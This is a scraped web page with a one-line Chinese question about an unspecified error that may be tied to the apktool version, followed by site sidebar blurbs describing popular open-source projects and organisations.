这是咋回事,找了很多,有说是apktool的版本问题导致的,希望能回答,非常感谢
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.